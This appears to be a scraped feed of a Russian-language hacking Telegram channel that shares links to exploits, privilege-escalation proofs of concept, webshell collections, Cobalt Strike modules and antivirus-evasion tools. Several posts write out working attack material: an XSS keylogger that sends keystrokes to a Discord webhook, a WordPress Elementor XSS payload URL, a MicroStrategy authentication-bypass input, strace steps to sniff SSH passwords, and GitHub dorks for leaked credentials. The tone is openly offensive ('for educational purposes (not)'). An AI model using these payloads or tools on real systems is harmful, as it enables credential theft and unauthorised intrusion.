Gepetto: IDA plugin which queries OpenAI's ChatGPT to explain decompiled functionsdownload#ida #ai |
|
2023-01-04 13:10:19 |
exploit for CVE-2022-46164 осознать |
|
2023-01-04 12:49:44 |
Выносите святых, опять спулер (стар, но автоматичен)#windows #spooler #exploit #for_fun |
|
2023-01-04 12:44:10 |
Exploiting CVE-2022-42703 - Bringing back the stack attack Когда протекает память - почитать#linux #memory #exploit |
|
2023-01-04 12:38:35 |
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread_look |
|
2022-12-29 05:25:32 |
Kernel Exploits Recipes Notebookread#linux #kernel #exploit |
|
2022-12-28 05:40:26 |
WebKit+Kernel exploit chain for all PS Vita firmwares Ну вдруг вам нужно)download |
|
2022-12-27 17:57:00 |
Hidden firewall in Linux KernelКак дополнительный рубеж безопасности для сервера*ReadME*DownloadME*WatchMe |
|
2022-12-27 13:07:48 |
Коллекция Exploits - MacOS*CVE-2022-22583CVE-2022-22616CVE-2022-22639CVE-2022-26690CVE-2022-26712CVE-2022-26728CVE-2022-32786CVE-2022-32800*download#exploit #macOS |
|
2022-12-27 05:21:23 |
Force AdminСоздаем бесконечные запросы UAC, заставляющие пользователя работать от имени администратора. Лол, ну то есть админа тупо достали)))) как достать соседаdownload |
|
2022-12-25 15:06:37 |
Рубрика - нам пишутHey, I've got pretty cool project that you could put on proxybar*Shellcodevэто инструмент, предназначенный для помощи в автоматизации создания шелл-кодов.download#shellcode |
|
2022-12-25 09:48:28 |
Linux kernel exploit development*book#exploiting #linux |
|
2022-12-24 17:08:03 |
CVE-2022-42046 Наконец то опубликовалиlocal privilege escalation POC download#windows #lpe #poc |
|
2022-12-23 10:58:54 |
Wordpress - XSS ( CVE-2022-29455)/wp-content/plugins/elementor/assets/js/frontend.min.jsusage:https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==#wordpress #xss |
|
2022-12-23 10:52:01 |
XSS Payload - Discord Keyloggerusage:<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>#discord #xss |
|
2022-12-23 07:48:50 |
Linux Kernel RCE (ksmbd)*CVSS SCORE: 10 из 10*Детали тутПатч прилетел в ядро только в ветке 5.15.61#10из10 |
|
2022-12-22 11:14:45 |
Охота на C2 C&C сервераПонимание работы и обнаружение фреймворков C2 (C&C) *1. Understanding & Detecting C2 Frameworks — TrevorC22. Understanding & Detecting C2 Frameworks — Ares3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)4. Understanding & Detecting C2 Frameworks — BabyShark*BonusTrack:Download BabyShark#C2 #hackers #botnets |
|
2022-12-22 06:29:41 |
CVE-2022-2602 - exploitОпубликован PoC Kernel Privilege Escalation Linux*О чем это, прочитать тут_1 и тут_2*POC (точнее два) - забратьExploit - забрать#linux #kernel #exploits |
|
2022-12-22 06:19:25 |
Оценка уязвимостей с помощью Nmap ?Вам нужен ВУльтерВьюер ! *Из коробки умеет:Server IP addressNetwork port numberNetwork port statusProtocol used by the network portNetwork service operating on the network port and its versionVulnerability CVE-identifierVulnerability ratingURL-link to the description of the vulnerability on the platform Vulners.comЗаказывайте прямо сейчас с уникальной финкой лгбтDownload |
|
2022-12-21 14:17:14 |
log4j ДА, еще один, но попрощеusage:python3 hik.py https://localhost:443 xxx.oastify.com:80downLoad |
|
2022-12-21 14:01:37 |
Php Remote file Inclusion and RCE in flatpressblog/flatpressProof of Concept#php #vuln |
|
2022-12-21 08:40:36 |
CloudmareПалим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.Но таки да - работает только если криво настроен DNS.download |
|
2022-12-21 08:14:02 |
Атаки на web-приложения на JAVAЭто обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.download*Bonus trackJar AnalyzerGUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода. download#java #security #web #hack |
|
2022-12-20 11:20:07 |
Только ВАЖНЫЕ вопросы ! #hackers #xss |
|
2022-12-19 11:24:38 |
linux injectorИнжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)usage:linux_injector <pid> <module>Да да, все так просто, иди уже.download |
|
2022-12-19 11:17:54 |
powershell-obfuscationОбфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)download |
|
2022-12-18 10:45:29 |
MacDirtyCowDemПолучаем root в macOS 13.0.1 через CVE-2022-46689exploit#root #macos #exploit |
|
2022-12-17 14:55:29 |
Dirty Vanityновая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.Слайды тутPOC тут#windows #bypass #edr |
|
2022-12-16 13:39:36 |
Бэкдоры в FreePBXPHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))Пятничное расследование читать#freepbx #backdoor |
|
2022-12-16 09:42:00 |
CVE-2022-28672Foxit PDF Reader Remote Code Execution Exploit (NOT POC)))) |
|
2022-12-16 09:38:19 |
Super XrayWeb Vulnerability Scannerdownload#web #vuln #scanner |
|
2022-12-16 09:30:54 |
Большая коллекция WEBSHELLSНа asp, aspx, php, jsp, pl, py, etcdownload#webshell |
|
2022-12-16 06:32:14 |
CVE-2022-45451 Acronis POCdownload |
|
2022-12-16 03:42:30 |
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling) *1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging2. UNIX Symlink Following and Race Condition in Hardware Reporting 3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol4. UNIX Symlink Following in Log File Creation of saposcol5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol#linux #privesc #sec |
|
2022-12-16 03:11:03 |
DirCreate2SystemПолучаем NT AUTHORITY\\SYSTEM*Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.*DOWNLOAD POC#windows #escpriv #POC #system |
|
2022-12-16 03:00:35 |
Пятничная викторина )))#docker #vuln |
|
2022-12-15 07:56:38 |
SIEMSIEM Tactics, Techiques, and Procedures read |
|
2022-12-09 10:00:40 |
Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.Исследование, анализ и обход.Learn#windows #syscall #bypass |
|
2022-12-09 09:50:48 |
DCOMPotatoКоллекция эксплойтов /повышения привилегий службы DCOM.*doownload#exploit #dcom |
|
2022-12-09 06:44:51 |
Ну во первых с пятницей.А во вторых, Я тебя сука по IP вычислю*только для образовательных целей (нет)#track #ip #deanon |
|
2022-12-08 19:56:26 |
в предложку кстати |
|
2022-12-08 13:59:41 |
Defender Exclusions BOFХороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))0_щ |
|
2022-12-08 13:42:39 |
CVE-2022-2414Дырка в pki-coreуязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы. |
|
2022-12-08 08:52:08 |
Получаем пароль от SSH в открытом виде*1. получаем точный идентификатор sshdpgrep -l sshd2. Отслеживаем системные вызовы strace -f -p <ssh_PID> -e trace=write -o capture#ssh #sniff #password |
|
2022-12-08 08:14:33 |
CVE-2022-29596MicroStrategy Enterprise Manager 2022обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login#microsoft #bypass |
|
2022-12-08 07:51:03 |
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread |
|
2022-12-07 12:58:39 |
Burp Suite PRO version 2022.12.2 |
|
2022-12-07 06:30:34 |
PentagridSMS-шлюз с открытым исходным кодом для пентест проектовreadinstall and run#gsm #gateway #sms #2G/3G/4G/5G |
|
2022-12-07 06:04:44 |
Random C2 Profile Generatorдля cobalt-strikedownload#cobalt |
|
2022-12-07 05:33:30 |
PENTESTING BIBLE |
|
2022-12-06 10:33:45 |
Linux PrivEscЗлой CRON для самых маленьких - тут#linux #cron #esc |
|
2022-12-06 07:17:51 |
Bug Bounty Wordlistsdownload |
|
2022-12-05 11:57:02 |
концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)download POC#windows #LPE #poc |
|
2022-12-05 07:13:32 |
The Defender’s Guide to the Windows Registryread#widows #defender #registry |
|
2022-12-04 17:44:16 |
Black Hat 2022 USA/ASIA/EuropeвидеоUSAASIAEUROPE |
|
2022-12-02 14:24:38 |
Recon Methods*part 1 - OSINT Host Discoverypart 2 - OSINT Host Discovery Continuedpart 3 - OSINT Employee Discoverypart 4 - Automated OSINTpart 5 - Traffic on the Target#cybersec #recon |
|
2022-12-01 20:21:12 |
WindowSpyЭто такой Cobalt Strike Beacon который "узконаправленно" следит за действиями пользователя (открытие определенных документов, вкладки браузера, vpn коннекты и тд).Такая движуха повышает скрытность и снижает обнаружение. Значит - маст хэв.download #cobaltstrike #module |
|
2022-12-01 14:22:21 |
The Linux Kernel Module Programming GuideNovember 10, 2022read |
|
2022-12-01 08:33:15 |
Microsoft Exchange ProxyNotShell RCEНе POC, а полноценный официальный exploit для metasploitdownload#rce #exploit #microsoft #metasploit |
|
2022-12-01 08:18:50 |
RCE root-уязвимость в утилите ping, поставляемой во FreeBSDCVE-2022-23093read |
|
2022-11-30 08:44:00 |
такое конечно, но актуальнее с каждым днем |
|
2022-11-30 08:10:51 |
модуль Metasploit для удаленного управления для развертывания полезной нагрузки и запуска ее с сервераRemote Control Collection Remote Code Executiondownload#exploit #remote |
|
2022-11-29 16:07:20 |
Vulnerability Feed#vuln #exploits |
|
2022-11-29 10:27:50 |
regex GitHub Dorks /ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/ |
|
2022-11-29 05:42:49 |
SpartacusDLL Hijacking Discovery ToolТот спартак вроде оскар получил)) #dll |
|
2022-11-29 05:35:29 |
Рановато, но таки даТОП 10 из 20221. Follina (CVE-2022-30190)2. Log4Shell (CVE-2021-44228)3. Spring4Shell (CVE-2022-22965)4. F5 BIG-IP (CVE-2022-1388)5. Google Chrome zero-day (CVE-2022-0609)6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)9. Atlassian Confluence RCE flaw (CVE-2022-26134)10. Zyxel RCE vulnerability (CVE-2022-30525) |
|
2022-11-25 07:18:33 |
Malware Analysis Seriespdf |
|
2022-11-25 07:13:29 |
Ох лоооол)))0day fanslink |
|
2022-11-22 19:23:00 |
MEGA 6500%в июне 2022 года я обнаружил уязвимость в системе облачного хранения MEGA, которая позволяла мне хранить больше данных, чем разрешено для бесплатных учетных записей. Мне удалось сохранить примерно 1300 ГБ данных в MEGA, несмотря на то, что ограничение на бесплатное хранилище для MEGA составляет 20 ГБ.Видела ман в сентябре, там был другой подход !Через яндекс фотки можно было попась в яндекс деньгиПочитать стори |
|
2022-11-22 13:37:53 |
Для Red Team*Red Team Management by JoasAwesome Red Team by yeyintminthuhtutAwesome Red Team Operations by Joas |
|
2022-11-22 12:57:04 |
CVE-2022-41924 RCE in Tailscale (vpn service)занятный research#vpn #rce #research |
|
2022-11-22 07:49:05 |
wireguard-initramfs*Включает wireguard во время загрузки ядра до монтирования зашифрованных разделов. В сочетании с dropbear это может обеспечить ПОЛНОСТЬЮ ЗАШИФРОВАННУЮ удаленную загрузку без хранения ключевого материала.Вообще есть конечно способы проще, но мало ли кому пригодится.download#security #linux |
|
2022-11-22 05:55:19 |
ViperSoftX: Hiding in System Logs and Spreading VenomSoftXна почитать |
|
2022-11-22 04:53:34 |
просто положу тутcypherhound |
|
2022-11-22 04:38:39 |
Прикольнопроверить, подвержены ли вы известной уязвимости в вашем оборудовании (ЦП) при использовании Linux, бонусом статус устранения:grep -r . /sys/devices/system/cpu/vulnerabilities/ |
|
2022-11-22 04:15:09 |
Active Directory Attack Cheat SheetRead#AD #attack |
|
2022-11-18 09:41:21 |
Всем привет !!!Вчера у нас был день рождения, каналу исполнился один год.Год был не простой, многое изменилось, приходили и уходили люди, менялась концепция канала, выстраивалась модель поведения.***Много интересных людей постучалось в ЛС с интересными предложениями, (спасибо Вам большое), некоторые из них мы начнем реализовывать уже сегодня.***Начнем с общего ЧАТа для общения и обмена опытом ЧЯТ***Если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8kС днем рождения proxy-bar !!!Иногда тут куется контент))) |
|
2022-11-18 05:39:59 |
будь в курсеinvite to defcon.social |
|
2022-11-18 05:31:06 |
ArtfuscatorЛучший подход к психологической войне против reverse-инженеров.Звучит конечно жирно,))downLoad |
|
2022-11-18 05:16:20 |
Рабочий PoC для CVE-2022-41040 and CVE-2022-41082 (A.K.A ProxyNotShell)*python poc_aug3.py <host> <username> <password> <command>*download POC |
|
2022-11-11 20:17:38 |
kernel r/w exploit for iOS 15 and macOS 12 *Эксплойт объединяет 4 уязвимости:CVE-2022-32845 : aned signature check bypass for model.hwx.CVE-2022-32948 : DeCxt::FileIndexToWeight() OOB Read due to lack of array index validation.CVE-2022-42805 : ZinComputeProgramUpdateMutables() potential arbitrary read due to Integer overflow issue.CVE-2022-32899 : DeCxt::RasterizeScaleBiasData() Buffer underflow due to integer overflow issue.Протестировано на:iPhone12 Pro (iPhone13,3) with iOS 15.5.iPad Pro (iPad8,10) with iPadOS 15.5.iPhone11 Pro (iPhone12,3) with iOS 15.4.1.MacBookAir10,1 M1 with macOS 12.4. |
|
2022-11-11 15:45:40 |
Кто твой источник ?Сбор информации из dark-web и темных уголков clearNet в контексте разведки киберугроз.deepdarkCTI Откуда:* Telegram channels, groups and chats* Discord channels* ransomware gangs sites* forums related to cyber criminal activities and data leaks* markets* exploits databases* Twitter accounts* RaaS (Ransomware As A Service) sitesНекоторые могут найти себя 😎#osint #Cyber_Threat_Intelligence |
|
2022-11-11 11:47:54 |
значит, случаи были |
|
2022-11-10 20:55:27 |
Вот так оно все и начинается - отличный тред - "У меня есть друг, друг пишет руткиты, а недавно я купил новый ноут, ноут стал странно себя вести и друг хохочет"Теперь комьюнити разворачивает детективную серию по поиску черной кошки в темной комнате.А был ли мальчик ? и был ли rootkitПочитать на ночь removing-a-rootkit (комменты обязательно)#idiots #exFriend |
|
2022-11-10 18:27:28 |
Backdooring Office Structures. Part 1: The Oldschool Backdooring Office Structures. Part 2: Payload Crumbs In Custom Parts #old |
|